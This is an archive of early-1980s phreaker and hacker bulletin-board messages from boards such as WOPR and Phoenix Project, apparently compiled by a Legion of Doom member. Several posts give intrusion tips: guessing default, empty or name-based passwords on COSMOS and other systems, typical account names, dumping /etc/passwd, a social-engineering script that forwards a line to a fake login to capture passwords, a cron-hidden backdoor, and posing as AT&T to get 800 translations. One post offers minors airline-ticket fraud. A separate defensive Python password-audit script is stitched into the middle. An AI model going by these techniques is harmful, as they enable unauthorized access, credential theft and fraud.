OK PHREAKS....YOU NEED HELP ON TSO FORMATS,SPF FORMATS,GDDM FORMATS? THIS IS THE GUY TO ASK....I'M DAMN GOOD AT IT...I WORK AS AN OPERATOR ON SUCH SYSTEMS AND KNOW THESE BABIES LIKE I KNOW MY OWN FACE....SO IF YOU NEED HELP...JUST DROP ME A LINE HERE OR ON MY BOARD....303-xxx-3015.... 24 HRS.....I CAN SHOW YOU HOW TO SET UP A PROGRAM ONCE ON IT TO DUMP ALL SYSTEM PASSWORDS AND ALL DATASET PASSWORDS...ETC...SET UP YOUR OWN USER ID...THE WHOLE 9 YARDS... I HAVE MY COMPANY BY THE F*CKING BALLS! SO I CAN TEACH YOU TOO.... JUST ASK ME.....

THE ONE AND ONLY DATA BANDIT
][][ ][][][
ON A MAINFRAME NEAR YOU!
---------------\-/-----------------
? MEMBER P.H.A.

Msg. :396
About :PHREAK BBS ON THE SOURCE!!!
From :MAXWELL WILKE
To :ALL
Date :3/25/83

Well, believe it or not, there is already two small phreak BBS's on The Source!!! They have traded some minor info, including some Sprint codes, and other such folly. But the thing is, it's there, has been there since october '82, and The Source knows about it, and they don't care! the BBS's are on the Source's PARTIcipate, which, admittedly, is a very large, powerful "thing." In addition to the two on there now, I took the liberty to create my own, entitled the "P-MENU.SAV GROUP". It is Conference # 83.3257 .
Any CompuServe conference members out there interested in moving over to PARTIcipate on The Source, let me know. If you do not have instructions on it, I'll mail 'em to you if you give me your address. I'll see what I can do about getting some more Source accounts. A friend of mine listed 'em all!

later, MW

P.S. To all fans of my modifications to The Source: Sorry, the good 'ole boys at STC picked up on what i did to them (Snicker... haw.. haw) and they corrected my modifications. i put 'em back, and they fixed 'em again, etc, etc, until they finally looked up in their PR1MENET REFERENCE MANUAL and figured out how to protect their accounts! Oh well...

Msg. :476
About :BAD NEWS
From :THE HACKER
To :ALL
Date :4/8/83

BAD NEWS SPRINT IS AT IT AGAIN THEY JUST CAUGHT SOMEONE LAST NIGHT NOW THEY ARE GOING FOR A SECOND KILL THEY ARE GOING AFTER ZERO PAGE THEY HAVE BEEN CALLING AROUND ABOUT SO IF ANYONE OUT THERE KNOWS HIM TELL HIM THAT THEY ARE CALLING AROUND NOW THAT SPRINT AND MCI ARE OUT TO GET ALL OF THE PHREAKS DOES ANYONE HAVE ANY GOOD SERVICES THAT ARE SAFE I AM USING ITT HOW SAFE IS THAT??? PLEASE RESPOND BACK SOMEBODY!

THE HACKER
[*]THE INNER CIRCLE[*]
=-=-=-=-=-=-=-=-

Msg. :519
About :SPRINT/MCI/OTHER BUGGERS
From :ROGER OLSON
To :ALL
Date :4/17/83

I highly recommend the procedure mentioned here earlier for staying OUT OF TROUBLE with "the competition". Look for your own passwords. Don't use the ones posted on BBS's except maybe once, to "get a feel" of how the particular switch works. If possible, test the codes between 8 - 11 AM to determine if they are business codes or not. When possible, use a local loop to call into/out of to the switch you are using. This simply adds more frustration in the event anyone is tracing. When possible, STAY AWAY completely from these OCC's, opting instead to use the Wats lines from large companies, via their remote call in ports.
You always want to stay away from systems that individually account for each call, as MCI/Sprint do. WATS lines, on the other hand, especially in older exchanges, do not record every number called - just the total time the line was in use, in hours per month.

In either case....have your phun now!! Cause after the Final Judgement and Settlement is implemented next year, you will place <> long distance calls by merely dialing the number desired, and entering a two digit "choice of carrier" code (for ATT, MCI, Sprint, Allnet, etc) and your local central office will use ANI to supervise your call! The outfits like MCI will discontinue dealing with the public as such, and will only deal who in turn will act like billing/collection agents for MCI, etc.

Watch and see! The times are changing! No more phucking around!

Msg.: 211
Date: 10/17/82
From: ROBERT ALLEN
To: ALL
About: WHITE HOUSE

IF ANY OF YOU ARE WONDERING, 800-424-9xxx IS WHAT IS KNOWN AS THE WHITE HOUSE SIGNAL (SWITCH BOARD), AND IT IS RELATIVELY NASTY/FUN, IF ONE KNOWS ALL OF THE SILLY CODEWORDS TO USE.. A FRIEND AND 8 OTHER PHREAKS GOT TRICKY DICK OUT OF BED AT 2:30 AM, BY ASKING FOR "OLYMPUS". I HEAR THERE ARE TAPES OF THE CALL FLOATING AROUND... 800-424-9xxx IS A WH. HOUSE PRESS RECORDING, THAT CAN BE QUITE FUN, IF YOU LIKE RON'S SPEECHES EARLY...

DIAL ANYWHERE, BUT DIAL WITH CARE
--BOB--

Msg. :111
About :***WARNING!!!***
From :JIMMY HOFFA
To :***PHELLOW-PHREAKERS***
Date :2/19/83 00:00

"FOR ALL YOU *PHELLOW-PHREAKERS* OUT THERE...... there seems to be some "negativeness" out there from a few select people!. WELL, For one thing "THEY" must realize A "*PHREAKER*" IS *NEVER* "*NEGATIVE*" (TAKE NOTE!!. RODGER-OLSON!!).. We ARE A SELECT BREED WHO HAVE BEEN BLEd WITH A REAL UNSATISFYING "THIRST" FOR.. "@KNOWLEDGE*" and Willing to share with "PHELLOW-PHREAKERS". WE CAN DO ANYTHING *MA* CAN DO, ONLY WE CAN DO IT BETTER!!!!! WHO NEEDS "PESSIMISM" ANYWAY????
DID PESSIMISTs HELP BUILD OUR COUNTRY, OUR COMPUTERS, OUR WORLD AROUND US??? NO!!! POSITIVE THINKERS DID, THAT'S WHO!!! PEOPLE WHO HAVE A NEVER-ENDING THIRST FOR KNOWLEDGE, CHALLENGE, AND FOUND NEW IN-ROADS TO HELP BETTER OURSELVES!!! THESE ARE WHAT "I" CALL THE "*REAL*" "PHREAKERS"!!! HOW ABOUT YOU!!! WE CAN TURN NEGATIVES TO POSITIVES EASIER THAN MOST CAN BRUSH THEIR TEETH! WE DON'T NEED NEGATIVES BECAUSE THERE'S ALREADY TOO MANY OUT THERE! WHAT WE NEED IS MORE PEOPLE WITH A POSITIVE-MENTAL-ATTITUDE THAT CAN HELP FURTHER OUR QUEST FOR KNOWLEDGE GAINING A SATISFACTION UNBEKNOWNST to "NEGATIVE"-"PESSIMISTIC" PEOPLE! HAD TO SAY IT AND I DON'T REGRET IT!

THIS WAS A>>>>>>
****PUBLIC************
****SERVICE************
***ANNOUNCEMENT*****************
_____________________________________________________________________________

*** {WOPR (617) SYSOP: Terminal Man. WOPR was a private phreak board and} ***
*** {was considered one of the best H/P systems of the time. The} ***
*** {following Messages are from 1984 unless stated otherwise} ***

Message #33: QUORUM
Msg left by: KING BLOTTO
Date posted: TUE MAY 29 3:13:14 PM {1984}

TO ALL MY SUBJECTS:

THIS TOPIC IS ABOUT CONFERENCES. AS MANY OF YOU KNOW, I DON'T CONFERENCE ANYMORE SINCE INFOWORLD PUT OUT AN ARTICLE ON IT ON MARCH 26. THE REASON BEING: THERE ARE N-O SAFE EXCHANGES BEING USED TODAY. EVERYONE SAYS; "BUT THIS IS CHICAGO", "THIS IS A DALLAS EXCHANGE", "THEY CAN'T TRACE CONFERENCES!". THE LAST ONE IS MY FAVORITE. THE SYSTEM USED BY ALMOST EVERYONE TODAY IS ALLIANCE TELECONFERENCE. THIS IS NOT BELL OPERATED. QUORUM IS THE BELL CONF. SYSTEM. AND IT'S WORSE THAN ALLIANCE. NEWS HAS IT, THAT ALLIANCE TELECONFERENCE MIGHT BE GOING UNDER NOW. BUT THEY HAVE STARTED TAKING PEOPLE WITH THEM. ( 5 TO DATE, AS I KNOW) ALLIANCE IS SUPER-PISSED, WELL, WOULDN'T YOU BE? AND ESPECIALLY AFTER EVERY LITTLE 15YR OLD LEARNS HOW TO START ONE UP, HE'LL BE JUST GETTING THEM MORE PISSED OFF. THE ABUSE HAS GROWN TO A MAXIMUM.
I AM TRYING TO FIND OUT ALL I CAN ON QUORUM AT WORK. I'LL POST THE INFO AS IT COMES IN.

MAJESTICALLY,
KING BLOTTO

P.S.- READ THE 3/26/84 INFOWORLD!

<1-48 LAST=33 E=mail Q=Quit T=Titles>

---------------------------------
69> COSMOS & UNIX
---------------------------------
Msg left by: BIOC AGENT 003
Date posted: MON AUG 6 11:18:23 AM

COSMOS is basically a modified UNIX system. When a non-privileged COSMOS user logs on, a program usually called /BIN/PERMIT is run. This tells the system which COSMOS commands the user is allowed to use.

On the other hand, when a privileged user logs in (ie, root, sys, bin, or preop), he is put into the normal UNIX shell (SH) where he can utilize UNIX commands such as: who & cat /etc/passwd (which will printout the password file). These users can also type CHDIR /USR/COSMOS and use ANY of the COSMOS commands since COSMOS is really a sub directory in a UNIX system. They also have a bad (good?) habit of leaving administrative notices and files (such as the decrypted passwords) laying around in different directories of the system. In fact, one system down in Washington, DC has a BIN account with no password (!) until some ASSHOLE decided to change the message of the day "I broke in, ha, ha --Joe Smuck"!!!

If you can't get into one of the privileged accounts then you might as well try for a regular COSMOS account. The typical setup is two letters followed by 2 numbers. Here are a few common ones:

TRxx (TRaining -- eg, TR01, TR02, etc.)
LSxx (Lac Staff)
LA (Line Assignement)
FMxx (Frame Manager)
NMxx (NAC Manager)
RSxx (Repair Service)
LMxx (LMOS debug)
etc...

Your best bet would be to go for one of the managers accounts such as NM01. There is also usually a user-name of COSMOS on the system.

The passwords are usually pathetic. Try things such as: COSMOS, FRAME, TELCO, etc.) Also try simple words such as: CAT, BAT, RAT, etc.

You'll have to guess at the Wire Center, though (WC). It will always b 2 letters.
Excelsior,

---------------------------------
1-79 LAST=69 [E]mail [A]bort [T]itles :

---------------------------------
78> Intro To C Search
---------------------------------
Msg left by: LORD DIGITAL
Date posted: FRI AUG 17 6:20:13 AM {1984}

Ok what the program "C PW Scanner", or "The C Search" does is fairly simple. It reads through the main password file searching for a match between A person's name and password and compares the two. If they match, or if a person's pw is simply his name spelled backwards, it will write the pw's into a file name of your choice. This should net you several passwords for every scan at least. The percentage of stupid people on any given system is usually quite high. The entire search should take about 5 mins. Obviously it can't do too much considering everything is crypted...

The entire program is internal, and assumes you have at least one accnt. already present on the system in question.

Instructions :> Pretty simple, all you do is: Upload the text file, use the CC (Compile C) utility, which will give you the "a.out" (assembly out), now just rename the file (mv) to whatever you wish to call it...

If anyone wants to trade various C programs (trojan horses (not that kind), programs that search for ports with out dial capability, etc...) leave e-mail

later-
.../\^ lord digital ^/\...
------------
-Spectral -- Phorce-

---------------------------------
1-90 LAST=78 [E]mail [A]bort [T]itles :

---------------------------------
83> the old fashioned way...
---------------------------------
Msg left by: BIG BROTHER
Date posted: FRI AUG 17 10:36:45 PM

It might be just as easy when hacking idiot's passwords (User Name, same again; first name, same again; etc.) to do it the old-fashioned way--by hand. Hey, in half an hour I found 15 accounts on my 'private' 617 VAX VMS 3.6. Some of them are even partially priviliged.

Another thing, always try default passwords.
If the system lets priv'gd users log in through dial-in lines and the default psswds are still there, you've struck gold. As the wise man say, "Keep it to yourself." I once the phone number to a Ztel Prime system (linked to Primenet which eventually links to milnet) with my operator account (User:OPERATOR, no password--default) to a few people. They abused the account (created 10 or 15 other accts for themselves) and it died within days....

---------------------------------
1-90 LAST=83 [E]mail [A]bort [T]itles :

---------------------------------
85> Pissed As SHIT!
---------------------------------
Msg left by: SHARP RAZOR
Date posted: SAT AUG 18 4:09:16 AM

That is right! i finally have the time and sit down and work with my Wash. DC BIN and PREOP accounts, and 'lo and behold...i call up (i hadn't called for about 5 days) and the #'s were changed. ...not 1..but all 4 dial-ups!!

Talk about an abused system! Some of you may not know it, but someone logged on and left a cute logon bulletin to all the AT&T bus. people, etc...that went sort of like 'haha, Kilroy wuz here!'...(real cute and intelligent, huh??)..besides that...there were times when I would call at 2AM on a weekday, and see 15-20 people on-line... ...and all on the same account!!! (since the # is changed, I can say it WAS the MF01 act. they were using)

Let this be a lesson NOT to go around POSTING COSMOS dial-ups on anything besides a very private BBS, and especially not the pw's!...I KNOW that the lower level accounts were given away.. ..but I hope at least the sysop ones weren't..in any case this really shows me not to be so liberal when I hand out COSMOS pw's again.

..Later..
..Sharp Razor>>
The Legion of Doom!

(dont worry, I am just a bit po'ed now, but I MAY get over it!!)
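Added example, not part of the archived messages or of LODCOM's material: a defender-side audit for the account weaknesses the WOPR posts above describe (a password equal to the user's name or its reverse, default or empty passwords left in place, and one account used by many callers at once). The account names, the default-password list and the session records are constructed for illustration.

```python
"""Added example (not from the archived posts). All data below is constructed."""
from datetime import datetime

# Constructed deny-list; a real one comes from your own vendor/default inventory.
DEFAULT_PASSWORDS = {"changeme", "operator", "password"}


def weak_password_reasons(login, real_name, candidate):
    """Reasons to reject a candidate password at set time (empty list = accept)."""
    cand = candidate.strip().lower()
    if not cand:
        return ["empty password"]
    reasons = []
    # Tokens anyone can read from a user listing: the login and each name part.
    tokens = {login.lower()} | {part.lower() for part in real_name.split()}
    for tok in sorted(tokens):
        if cand == tok:
            reasons.append(f"equals account token '{tok}'")
        elif cand == tok[::-1]:
            reasons.append(f"is account token '{tok}' reversed")
    if cand in DEFAULT_PASSWORDS:
        reasons.append("is a known default password")
    return reasons


def peak_concurrency(sessions):
    """Map account -> highest number of sessions open at the same moment."""
    events = {}
    for account, start, end in sessions:
        # (time, -1) sorts before (time, +1): a logout and a login at the same
        # instant are back-to-back use, not an overlap.
        events.setdefault(account, []).extend([(start, 1), (end, -1)])
    peaks = {}
    for account, evs in events.items():
        open_now = peak = 0
        for _, delta in sorted(evs):
            open_now += delta
            peak = max(peak, open_now)
        peaks[account] = peak
    return peaks


def shared_accounts(sessions, limit=1):
    """Accounts whose simultaneous sessions exceed the allowed limit."""
    return sorted(a for a, p in peak_concurrency(sessions).items() if p > limit)


def _t(hhmm):
    """Build a timestamp on a constructed date from an HH:MM string."""
    return datetime.strptime("2024-01-15 " + hhmm, "%Y-%m-%d %H:%M")


# Constructed session log: (account, login time, logout time).
SESSIONS = [
    ("ops01", _t("02:00"), _t("02:40")),
    ("ops01", _t("02:05"), _t("02:30")),
    ("ops01", _t("02:10"), _t("02:20")),
    ("eng02", _t("09:00"), _t("09:30")),
    ("eng02", _t("09:30"), _t("10:00")),
]

if __name__ == "__main__":
    for login, name, pw in [("jsmith", "John Smith", "htims"),
                            ("operator", "System Operator", "")]:
        print(login, weak_password_reasons(login, name, pw))
    print("shared:", shared_accounts(SESSIONS))
```

The password check belongs at the point where a password is set, when the plaintext candidate is available; the concurrency check runs over whatever login and logout records the system already keeps.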
---------------------------------
1-90 LAST=85 [E]mail [A]bort [T]itles :

Message #87: MORE ESS
Msg left by: PAUL MUAD'DIB
Date posted: TUE JUN 19 2:59:05 PM

I've got many switch and frame #'s to trade, and here's a fun way to get pw's or destroy bbs's- call the switch and do what I said in msg 78 asking for call forwarding on an anonymous # (NOT your local tym- or tele- nets, they DO know them to be special dials)..when he puts it in, call the "frame" #, and say "Hiya, this is Bob Lineman, could you run into the MDF, and try to activate the call forwarding on NNX-XXXX? send it to NNX-XXXF, please, I need to check it out from both ends..." then, hook your computer up to the payphone that NNX-XXXF is, and set up a simulator for the login to that system. When you have it in your pocket, call the frame back and say "Hi, me again, would you just disengage the forwarding on that # for me? I've got the problem, but I need it receiving calls to fix it.." then you can re-hack it later if you want by just calling the frame again in a different shift..

later,
Paul Muad'Dib
Legion of Doom

1-90 Last=87 E=Mail Q=Quit T=Titles -

Message #38: BOSTON COSMOS
Msg left by: DOCTOR WHO
Date posted: WED MAY 30 10:16:55 PM

OK HERE IS A FRESH COSMOS DIALUP..SORRY NO PASSWORD...GO TRASHING BOSTONIANS! 617-338-5xxx

SPEAKING OF COSMOS, I WENT TRASHING TODAY AND GOT A COSMOS PASSWORD. IT SEEMS TO BE A HIGH ACCESS ONE, THEY BROKE IN ON THE GUY USING IT TO DO MAINTENANCE. THE NAME IS FF01. NOW ALL I NEED IS THE DIALUP. I CAN'T SCAN WITH MY MODEM. IF ANYONE WANTS TO DO A LONG-DISTANCE SCAN OF 413, I WILL GIVE YOU THE EXCHANGES TO HACK, AND THE PASSWORD. PLEZE! OH, IF THERE ARE ANY PHREAKS IN THE 413 NPA READING THIS, PLEASE REPLY..ITS LONELY OUT HERE!

CONFERENCES: TOO BAD IF A COMPANY GOES OUT OF BUSINESS BECAUSE OF PHREAKS...ONE LONG-DISTANCE COMPANY WHO IS BUGGING ME SAYS THAT PHREAKING IS FORCING THEM OUT OF THE BUSINESS THAT IS BULLSHIT. DON'T BELIEVE IT.
THE PHONE CO.'S MAKE SO MUCH PROFIT ITS PITIFUL. IF IT WASN'T FOR PHREAKS WE WOULD STILL BE STUCK WITH SXS. SO WE HAVE CREATED MANY JOBS..IN AT+T, GTE, ITT...AND IN THE FBI. SO FEEL GOOD..YOU'VE HELPED THE ECONOMY! I HEARD THAT MCI TAKES A BIG TAX LOSS ON STOLEN SERVICES. MUCHO BUCKS SAVED! THATS ALSO (PROBABLY) THE REASON THE METROPHONE DOESN'T TRY HARD TO CATCH PHREAKS.

YOU KNOW IF THERES ONE THING I CAN'T STAND ITS POLITICS AMONG PHREAKS..ONE PERSON TRYING TO MAKE OTHERS L1 %'AD AND SAY" I RULE!" YOU KNOW WHAT I MEAN? YOU PEOPLE WHO I'M TALKING ABOUT: NOW THAT YOU'RE HERE UNDER DIFFERENT NAMES, TRY TO BEHAVE!..'NUFF SAID

THE T.H.A. (TIMELORDS HOLY ALLIANCE) IS THE GROUP THAT REALLY RULES..BECAUSE WE DON'T HAVE ANY RULES...NO INITIATION.. NO NOTHING...AND YOU NEVER HEAR ANYBODY BADMOUTHING US, DO YOU?

IS THERE A GOOD WAY TO BULLSHIT THE FONE CO. FOR THE COSMOS DIALUP?

BYE....
-----------=?> DOCTOR WHO

---------------------------------
MESSAGE #81: HACK-A-TRIP
---------------------------------
Msg left by: BROADWAY HACKER
Date posted: TUE JUL 24 8:24:02 PM

As you have probably seen on some other good boards, I am extending an offer to anyone who wants to come to New York for free. Hacking airline tickets isn't as hard as you think. If you're interested, maybe to go to a TAP meeting or something, leave me EMAIL. It is relatively easy, but one screwup can ruin you. There are others who may have some idea how this is done, but have not actually done it. Leave me EMAIL if you're interested. You must be a minor, however, and you must leave me a VALID phone number in feedback since there are security measures involved since it is grand fraud.

*** Broadway Hacker ***
(-+-)(Chaos)(+-+)
Hack-a-trip

---------------------------------
MESSAGE #63: ARGGGH!
---------------------------------
Msg left by: KARL MARX
Date posted: SAT JUL 21 4:14:43 PM

Ahem, I don't know if I am getting moral or something, but things are getting pretty, well, strange.
First off: unix is pretty easy to crash if you want to--but why would you want to? Obviously, very few people know "everything" about Unix, and I would like one reason that destroying a system would be better than learning to use its "special" features. If you want to get your face on Newsweek, go ahead, but otherwise, don't start destroying stuff just for the sake of vandalism! Instead of being a vandal, do something Robin Hood-ish, like nice the parent process of the batch runner to -20 or something. Or give everyone full privilige to / or make them all user 1.

Otherwise, as for metro tracing, that's kinda hard to swallow. Would whoever's friend's sister care to elaborate on that one?

I don't know if anyone cares, but I had a chance to take a look at those "goldphones" and Geez!!! There were codes written all over it! I don't understand some people very well. That is simply stupidity.

There is really nothing "new and exciting" in phreaking anymore... most of what you hear is bullshit from some twelve-year-old that just learned how to use metro last week. There is simply no "new" anything! Eventually there will be, but until then these "phreak" boards will simply be "how to phreak"--tutorials instead of journals.

Drat!
:::::::::::::::::::::Karl Marx LOD

---------------------------------
You have been on over your time limit.
Use the 'O' option to log off.
____
Logout Job ??, TTY ??, On 21-7-84 For 34 Minutes
_____________________________________________________________________________

*** {Samples from the Phoenix Project BBS (512), Sysop: The Mentor} ***
*** {As many are aware, the Phoenix Project was one of the intended} ***
*** {targets in the Hacker Crackdown of 1990 and was erroneously} ***
*** {affiliated to Steve Jackson Games' Illuminati BBS} ***

*** {Other Networks Sub-Board} ***

8/60: Autonet...
Name: Erik Bloodaxe #2
Date: Thu Jan 11 13:18:39 1990

It wouldn't be such a great idea to scan Autonet through the Telenet gateway.
Autonet raised a holy shit-fit when Urvile was doing it about a year ago, and sent Telenet Security all kinds of nasty mail bitching for them to stop whoever in 404 was connecting to their system. Telenet blew them off, but if it started again, Telenet might just have to listen to their whining and crack down.

I suggest you (or whoever is planning on this) do your scanning through a main dialup. It will be slower, but probably safer in the long run.

->ME

46/60: pac*it
Name: Corrupt #114
Date: Thu Feb 01 06:59:10 1990

pac*it plus calls 03110..germany and spain..I didn't think it called DPAC. useful for scanning spain..but at this point......hmm I'd be scared of what MCI i would do then GM... anyone up on Kinneynet?hehehehehe I'll post the dialup later but u need a NUI for it :-((

Develnet? I thought the Develnet was just x.25 server software! I've seen several Develnet pads and I had got into the systems it connected to and they weren't MEAN related...maybe I'm wrong?(it was a modem company.) Needless to say I was pissed when everyone used it to death just to see a pretty (canada)..the reason it disconnects is because of where you're calling from..if you call from canada u probably won't experience this problem....on the 03110 develnet..same thing cept you have to be at console...there are still some systems available from there that r open..here's one IBM <-i couldn't hack it so of course I posted that one:-))

C U-->greets from [8lgm]corrupt

*** {The HP-3000 Sub-Board} ***

36/41: Woah!
Name: Erik Bloodaxe #2
Date: Mon Jan 22 03:36:40 1990

I wasn't ragging on MPE! Not at all, i was just "JOking" about the large numbers of hp-3000 systems around the world and the unbelievable ease in gaining access on one. Geez, read...MPE seems ok, just kinda hard to get used to. I mean, I'm in HUNDREDS of hp's, but until last year I didn't know what to do with them...so they just sat there.
UNIX is just as lame security-wise, but On a percentage basis, I have gotten into 85-90% of the HP's I have found, while I've only gotten into about 50% of the UNIXes I've found.

(Look at me grovel before one of the two HP experts I've ever seen...pathetic, isn't it?)

Wiz, no offense intended towards your adopted O.S.

->ME

*** {UNIX Sub-Board} ***

60/69: both ways
Name: Corrupt #114
Date: Mon Feb 05 05:08:25 1990

nice trojans
------------
good security this works both ways....look-out for unixes(and VMS sites) that keep another copy of /etc/passwd (or sysuaf.dat) and everynite rewrite it over the one used for login(some any mods are discovered)..u can alternately install some security inside like this for yourself...(hide it in CROn) (or wherever u want on vms:-)) understand? I know I'm not clear:-(( but thats works for you sometimes and it's simple if you know script:-)

anyone here into Rapid Fire hacking?

*** {Electronic Banking Sub-Board} ***

12/32: Treason & Government Smegma...
Name: Erik Bloodaxe #2
Date: Fri Jan 19 02:06:13 1990

It's the Major SS buzzword these days. Treason. If someone is poking around in ANY system they feel is sensitive (although they leave sysdiag unpassworded, or lp password lp, etc..) they will then label you as: "A Serious Threat to National Security!"

Give me a break.

Hell, I think my association with Par & Phoenix alone is enough to get me the firing squad. I haven't even done anything, but it seems that everything bad that's happened I keep getting brought up, as I know such and such, or I somehow know EVERYTHING about how such and such happened.

Well, I've tried my best to be good, and stay out of government things, military things, etc... I've even edited out the "sensitive" things I've run across in the Telenet scanning just for their sense of well being, but if I begin to feel threatened, it's all going out. Unabridged.
We will see...I'm already getting nervous...the feds are already pissed that LOD is still kicking, and this bbs must have SLAMMED it into their faces. And I know that the EFT files must have pissed them off as well, although that may or may not have anything to do with this bbs suddenly going back up.

Well, I'm not a threat to ANYTHING, except myself maybe. Anyone who knows me knows that. Back me up people. This is my public announcement of not-guilty to any and all crimes against the Security of the United States.

So what if I was scanning 2502 a while back? Anyone ever think that it would be in THE INTEREST OF NATIONAL SECURITY to hop into a Soviet system? I thought it would. Par knows what I mean. Hell, The government now seems to think he's a spy, and wants to shoot him. Killing Teenagers for fun is not my idea of constructive problem solving guys.

Take an extended course in the ways of the hacker. That education might do you all a world of good. You may even pick up something you missed in your little weekend getaway training seminar in fighting computer crime. When you come and kick in my door, (don't step on the cat), and if you don't blow me away first, maybe I can educate you all a little better on what is REALLY GOING ON!

(This message posted for the Secret Service & CERT, et al. whomever is posing on here, or reading this via Mentor's & My own Data Taps)

->ME

*** {Phone Co. Computers Sub-Board} ***

3/46: LMOS
Name: Acid Phreak #8
Date: Tue Jan 09 17:56:23 1990

The most recent LMOS interlude was one in my local area. Got the host processor (an IBM 3270) off Predictor. Overall, a very handy tool to add to your telco 'collectables'. The FE's of course were PDP 11/70s using MLT for reference.

Aw thit.. lookit all dem Hicaps.

--ap (advanced phreaking)

6/46: ICRIS
Name: Phiber Optik #6
Date: Wed Jan 10 16:37:27 1990

Not to nitpick, but an LMOS CP is an IBM S370 (3270 is an SNA, used to get to BANCS through LOMS for instance).
CRIS, as mentioned, the Customer Record Information System is a dandy little IBM system whose main purpose is to house customer records. There are a small handful of "CRIS" systems, like LCRIS (Local), and ICRIS (Integrated, which should be noted is used by the Residential Service Center). Here in NYNEX, the only way to reach these systems (we obviously aren't hardwired hackers) is through BANCS, a bisync network. BANCS is not direct dialable, but IS available through a 3270 link on the LOMS system, used by LDMC (LAC or FACS, depending where you live). And LOMS IS accessible. A host of systems are also available through FACS (which can be reached through LOMS on BANCS) such as CIMAP, LMOS, SOP, TIRKS, the COSMOS-PREMISE interface, etc. So as you can see, rather than going after any specific system, going after the RIGHT system will pay off greatly (LOMS in this example).

Oh, waitta-minnit, those mentioned systems are off of BANCS, sorry. You can reach FACS on BANCS, and access a couple 'o things like some of those mentioned, COSMOS (certain wire centers only), etc. OK, enough rambling. Let's hear someone else's input.

Phiber Optik
Legion Of Doom!
$LOD$
____________________________________________________________________________

*** {The Twilight Zone BBS (203), Sysop: The Marauder} ***
*** {NOTE: All messages from 1985 unless stated otherwise} ***

[MSG #12 OF 22]: INWATS & X-LATIONS
FROM: THE MARAUDER
DATE: MAY 08 {1985}

Under CCIS, INWATS (800's) are handled completely different from the older method (the old method i don't completely understand, but it translated somehow based on it's own prefix & suffix).
under ccis on the other hand, inwats #'s are handled in the following manner: when the 800 number reaches your toll office, a query is made to the 'INWATS DATABASE', (the master database being at the KC RNOCS I believe), i believe each RNOC (regional network operations center, of which there are 12, one for each region), has their own database (which is updated on a regular basis). a query is made (via a CCIS link) to the inwat's database, and a POTS (plain old telephone service, just a plain 10 digit ddd telephone number, ie: npa+pre+suffix), and the POTS number is pulsed out from the toll center and your call is completed just like a normal ddd (direct distance dialing) call, although it was noted that the call was an 800 at the origination (your) toll office, so and you are not charged for the call..

with this in mind, it's a simple matter for the inwat's database that handles your region to return a translation that differs from another region's translation, for example say fred phreak in new jersey places a call to LDX extender service at 800-XXX-3333, upon reaching his toll center, the toll center queries the inwat's database that handles new jersey, and a POTS translation is returned which for obvious reasons would be the closest port to him, so let's say the translation was (201)-XXX-4455, the toll office upon receiving this would proceed to complete the call, and fred phreak would be connected to LDX at (201)-XXX-4455..

continued next..

<1-22, ^12> [?/HELP]:

[MSG #13 OF 22]: ABOVE CONT'D
FROM: THE MARAUDER
DATE: MAY 08

now, on the other hand let's say bill phreak in california calls the LDX extender service at (800)-XXX-3333 (same number fred called from NJ), his regions inwat's database may return a completely different POTS x-lation say (213)-XXX-1119, again being ldx's closest port to bill phreaks toll center..
utilizing ccis, and inwat's databases, other clever things are possible for example, as you all know ALLIANCE teleconferencing is unavailable on weekends, here's how that works: when you dial 0-700-XXX-1000, that number is intercepted at TSPS and translated into a corresponding WAT'S number, for this example, we'll say it translates to (800)-XXX-1003 (white plains), and forwarded from tsps to a toll center, the toll center upon receiving the 800-XXX-1003, queries it's inwat's database and a POTS translation is returned say 914-XXX-6677, which is the DN (Directory Number) for the bridge-center. now on a weekend, the inwat's database, instead of returning 914-XXX-6677 may return 914-XXX-0077, which would terminate at a recording saying alliance is not reachable on weekends.., that's why everyone is always interested in the 'ALLIANCE TRANSLATIONS'. Because if you have the x-lation you can simply use a blue box to route yourself directly to the bridgecenter and bypass the whole translation procedure..

any questions, please post..

The Marauder
Legion of Doom!
____________________________________________________________________________

*** {Black Ice Private (703) BBS Message Base Sample} ***
*** {Black Ice had a VERY restrictive user base as shown in the} ***
*** {included userlist. The quality of the messages was excellent} ***

%> Sub-board: Advanced Telecommunications
%> SubOp: ANI Failure
%> Messages: 100
%> Files: 0

%> Message: 32 of 100
%> Title: 800 xlations
%> When: 12/16/88 at 2:45 am
%> Left by: ANI Failure [SubOp] [Level: 8]

You can get them from a 4ess or some work centers like RNOC and RWC (good luck, have a dialback).. Or from ONAC in Kansas City (816). The Operations Network Administration Center is the focal point for 800 services in the AT&T network. ONAC works in conjunction with the AT&T WATS centers (I think there are 3?) and 800 service co-ordinators to do operations, administration, and maintenance on the 800 number network.
You can reach the WATS centers phree of charge with a 959 plant test number in the correct NPAs (I know 914 has one). I think it was 959-5000 but that might be wrong.

The tech. term for an 800 xlation is a plant test number. This does not have to be pots, but can be other system codes like 122, 195, 196, 123, etc. The only type of 800 number that terminates in POTS is a READYLINE 800 number (AT&T). I don't know about sprint, mci, etc. though. A good topic for investigation though, thankx for the idea!

If you have access to a 4e (does anyone on here have this? If so I'll trade anything I have for a 4e), you can type this in to translate a number:

well....i can't find the right notebook. it is something like:

TEST:DSIG;INWATS 800 nxx xxxx!

This does a Direct Signaling (DSIG) message into the 4E which commands the 4E to pull the 800 internal number from the network control point (NCP) over CCIS links. The 4E you are on must be included in the service area of that 800 number though, i.e. someone in the area served by that 4E would have to be able to dial it in order for the 4E to have the xlation. So if the 4E is not in the right area it will say 'NON SUBSCRIBED' or something of that nature.

Oh, I just remembered, there is an AT&T work group named DSAC (Direct Signaling Admin. Center) that performs direct signaling messages into switches and things. If you want the DSAC #, I can provide it..I don't think too many phreaks have their number so they might be worth engineering.

Oh - the 800 xlation input message into the 4E was social engineered a long time ago by The Marauder and Phucked Agent 04 from an RWC. But, thanks to a fuck up by The Executioner and friends, the RWCs became very tight lipped...it only takes 1 fuckup...

Um, I have gotten translations from the customer before, posing as AT&T and giving them bs about 'MLT has found a potential trouble in your circuit' (haha) and we need your translation number.
I only did this once since I have never had any major need to pull 800 xlations. But that will work in some cases if a human answers. Or if you can get the terminating company name/location, you can keep engineering and narrow down the locations of the xlation (say within their centrex group or something) and then (ughh..dangerous and slow) scan for the number, or do more engineering for it, etc...

There is an easier way to get 800 translations but I swore not to tell anyone (that was the conditions of me getting the info) from a certain AT&T dept and a certain support system...if you want a translation in an AT&T area I will try to get it for you though....so leave mail or post and maybe I can help..

ANI-F
legion of 800 numberz
____________________________________________________________________________

*** {UNIX Sub-Board} ***

%> Sub-board: UNIX
%> SubOp: The Prophet
%> Messages: 99
%> Files: 1

%> Message: 5 of 99
%> Title: getty, login
%> When: 12/16/88 at 6:19 pm
